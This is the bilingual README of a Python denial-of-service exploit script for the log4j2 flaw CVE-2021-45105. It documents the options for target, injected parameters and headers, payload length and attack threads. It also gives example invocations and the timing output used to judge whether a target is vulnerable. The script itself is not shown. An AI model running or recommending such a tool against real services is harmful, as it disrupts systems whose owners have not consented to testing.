log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc


说明 about

author: 我超怕的

blog: https://www.cnblogs.com/iAmSoScArEd/

github: https://github.com/iAmSOScArEd/

date: 2021-12-20

log4j2 dos exploit

log4j2 dos 漏洞利用脚本

CVE-2021-45105 Exploit

CVE-2021-45105 利用脚本

利用方式 how to use


Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>

-u,--url    	 attack target
-m,--method    http method, only get and post. default is get.
-d,--data   	 get or post params, json format like:{\"username\":\"\"}
-H,--header    request header, json format like:{\"user-agent\":\"\"}
-l,--loop    	 payload loop times (or length),default 100.it is determine where is the params, example get param max length or post param max length or request header max length
-t,--thread    attack thread. default is 0, just request once.

Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"}
Log4j2_dos.py -u http://url.com/ -d {\"username\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -l 500
Log4j2_dos.py -u http://url.com/ -m post -H {\"user-agent\":\"\"} -l 500 -t 100
Log4j2_dos.py -u http://url.com/ -m post -d {\"username\":\"\"} -H {\"user-agent\":\"\"} -l 500

Output format:

[+] normal time:0.11111

[+] attack time:2.00000

if attack time -normal time>1 or something,it maybe exist vulnerability,can use -t param set attack thread.


 Log4j2_dos.py -u <url> -m <method> -d <params> -H <header> -l <loop> -t <thread>
-u,--url   		 攻击目标
-m,--method    默认为get,http方式,仅支持get和post
-d,--data   	 get或post请求参数,json格式,如:{\"username\":\"\"}
-H,--header    请求头, json格式, 如:{\"user-agent\":\"\"}
-l,--loop    	 默认为100,payload循环长度,根据参数在不同的位置,设置不同的数值,如请求头最大允许长度、get最大长度、post最大长度
-t,--thread    默认为0,表示仅请求一次,攻击线程.。


[+] normal time:0.11111

[+] attack time:2.00000

如果attack time延迟很大,说明漏洞存在,可以利用-t参数设置攻击线程


请勿用于非法用途,仅供学习参考。 任何违法行为与本人无关。



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